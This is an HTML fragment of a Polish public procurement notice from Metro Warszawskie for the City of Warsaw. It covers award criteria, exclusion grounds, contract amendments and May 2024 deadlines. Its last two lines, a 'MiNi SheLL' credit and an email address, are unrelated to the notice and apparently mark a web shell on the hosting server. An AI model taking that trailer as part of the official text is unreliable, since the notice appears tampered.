<h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu realizacji Przedmiotu Zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Wykonawca ZAŁĄCZA DO OFERTY, aktualne na dzień składania ofert:<br/>a)	oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania składane na podstawie art. 125 ust. 1 ustawy Pzp oraz na podstawie ustawy, o której mowa w pkt 10.4 SWZ, wg wzoru stanowiącego zał. nr 3 do SWZ;<br/>b)	pełnomocnictwo upoważniające do złożenia oferty (jeżeli dotyczy),<br/>2.	Zamawiający, zgodnie z art. 274 ustawy Pzp, WEZWIE WYKONAWCĘ, którego oferta zostanie najwyżej oceniona do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących oświadczeń i dokumentów (podmiotowe środki dowodowe):<br/>2.1.	na potwierdzenie braku podstaw wykluczenia Wykonawcy na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp - odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej;<br/>2.2. oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu złożonym wraz z ofertą zgodnie z pkt 11.1 lit. a) SWZ, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, wg wzoru stanowiącego zał. nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przez Wykonawcę wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca załącza do oferty pełnomocnictwo upoważniające do złożenia oferty (jeżeli dotyczy).<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty:<br/>1) oświadczenie, z którego wynika które usługi wykonają poszczególni wykonawcy,<br/>2) pełnomocnictwo do reprezentowania w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia publicznego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia, w rozumieniu art. 58 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 z późn. zm. – dalej „ustawa Pzp”) ustanawiają pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty w formie elektronicznej, z uwzględnieniem postanowień pkt 16.1.4 SWZ. Wszelka korespondencja prowadzona będzie wyłącznie z ustanowionym pełnomocnikiem.<br/>Oferta składana przez Spółki cywilne (ustawowo zdefiniowane w Tytule XXXI Księgi Trzeciej ustawy z dnia 23 kwietnia 1964 r. – Kodeks cywilny) zgodnie z art. 4 ust. 2 ustawy z dnia 06 marca 2018 r. Prawo przedsiębiorców jest traktowana, jako oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego (art. 58 ustawy Pzp) i solidarnie za nie odpowiadających. <br/>Ilekroć w SWZ znajdują się zapisy dotyczące Wykonawcy, stosuje się je odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający może żądać przed zawarciem Umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zgodnie z treścią art. 455 ust. 1 pkt 1) ustawy Pzp, Zamawiający dopuszcza możliwość zmian postanowień zawartej Umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia w następującym zakresie i w przypadku zaistnienia następujących okoliczności: <br/>1)	zmiany terminów określonych w Umowie, w przypadku wystąpienia przyczyn wskazanych poniżej w lit. a) -d), maksymalnie o okres ich trwania, o ile ich wystąpienie będzie miało wpływ na terminy określone w Umowie:<br/>a)	przerwania lub opóźnienia w wykonywaniu Przedmiotu Umowy spowodowanego okolicznościami, za które Wykonawca nie ponosi odpowiedzialności,<br/>b)	zmian przepisów prawa, mających wpływ na termin wykonania Przedmiotu Umowy lub sposób wykonywania Przedmiotu Umowy,<br/>c)	opóźnień w rozpoczęciu lub wykonywaniu Przedmiotu Umowy powstałych z przyczyn nieleżących po stronie Wykonawcy, których nie można było przewidzieć w chwili zawarcia Umowy, przy zachowania należytej staranności,<br/>d)	opóźnień w realizacji Przedmiotu Umowy wynikłych z winy Zamawiającego lub innych wykonawców, za które Wykonawca nie ponosi odpowiedzialności;<br/>2)	zmiana ceny umownej w przypadku ustawowej zmiany stawki podatku od towarów i usług;<br/>3)	zmiany zakresu części Przedmiotu Umowy powierzonych Podwykonawcom, wskazanej w § 7 ust. 2 Umowy;<br/>4)	zmiany w wymaganej sprawozdawczości i rozliczeniach kosztów wykonania Przedmiotu Umowy;<br/>5)	zmiany oznaczenia danych dotyczących Zamawiającego lub Wykonawcy;<br/>6)	zmiany wynikające z orzeczeń sądów powszechnych, decyzji administracyjnych i orzeczeń sądów administracyjnych;<br/>7)	zmiany wynikające ze zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia Umowy, wraz ze skutkami takiej zmiany regulacji prawnych;<br/>8)	zmiany Umowy w przypadku faktycznie poniesionej przez Wykonawcę i udokumentowanej szkody – z winy Zamawiającego oraz z powodu zmiany terminu wykonania Przedmiotu Umowy;<br/>9)	zmiany z powodu wystąpienia siły wyższej (dotyczące w szczególności terminów wykonania Przedmiotu Umowy).<br/>2.	Przez „siłę wyższą” należy rozumieć zdarzenie zewnętrzne nie dające się przewidzieć, na które strony Umowy nie mają wpływu, i którego skutkom nie można było zapobiec, nawet przez zachowanie należytej staranności, a które uniemożliwia Wykonawcy lub Zamawiającemu wykonanie w całości lub w części jego zobowiązań zgodnie z treścią Umowy. Są to w szczególności klęski żywiołowe i inne zdarzenia związane z działaniem sił przyrody, takie jak: trzęsienia ziemi, powódź, a także zdarzenia pozostające poza kontrolą i wolą Stron Umowy oraz osób, za które Strony ponoszą odpowiedzialność (w tym Podwykonawcami), takie jak: wojna i działania wojenne, zamieszki wewnętrzne, akty terroryzmu, skażenia radioaktywne, stan epidemii itp.<br/>3.	Zamawiający dopuszcza również wprowadzenie zmian postanowień zawartej Umowy <br/>w przypadku wystąpienia okoliczności, o których mowa w art. 455 ust. 1 pkt 2) – 4) oraz art. 455 ust. 2 ustawy Pzp. <br/>4.	Warunkiem wprowadzenia zmian zawartej Umowy jest sporządzenie podpisanego przez Strony protokołu konieczności określającego przyczyny zmiany oraz potwierdzającego wystąpienie okoliczności uzasadniającej zmianę. Protokół konieczności będzie załącznikiem do aneksu.<br/>5.	Wykonawca nie będzie uprawniony a Zamawiający zobowiązany do wprowadzenia jakiejkolwiek zmiany do Umowy, jeżeli miałaby ona wynikać z niewykonania lub nienależytego wykonania Umowy przez Wykonawcę lub podmioty za działania lub zaniechania których Wykonawca ponosi odpowiedzialność jak za swoje własne, co nie wyklucza prawa Zamawiającego do udzielenia zgody na taką zmianę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-27 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy zakupowej Zamawiającego https://postepowania.metro.waw.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-27 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiającym w niniejszym postępowaniu jest Miasto Stołeczne Warszawa, reprezentowane przez Zarząd Transportu<br/>Miejskiego w Warszawie, w imieniu i na rzecz którego, na podstawie:<br/>- Aktu założycielskiego spółki Metro Warszawskie spółka z ograniczoną odpowiedzialnością z siedzibą w Warszawie, w<br/>szczególności § 39-40,<br/>- Umowy zawartej z m. st. Warszawa z dnia 23.01.2003 r. nr 3653/EH/03 o inwestorstwo zastępcze,<br/>- pełnomocnictwa z dnia 10.01.2014 r. o znakach ZTM-NPZ-OGA-0141-2-1-14,<br/>działa Metro Warszawskie Sp. z o.o. (M.W.), 02-798 Warszawa, ul. Wilczy Dół 5, Regon: 015314592, NIP: 526-26-73-576,<br/>KRS 0000146121, Kapitał zakładowy: 328.917.500,00 zł.

Creat By MiNi SheLL
Email: jattceo@gmail.com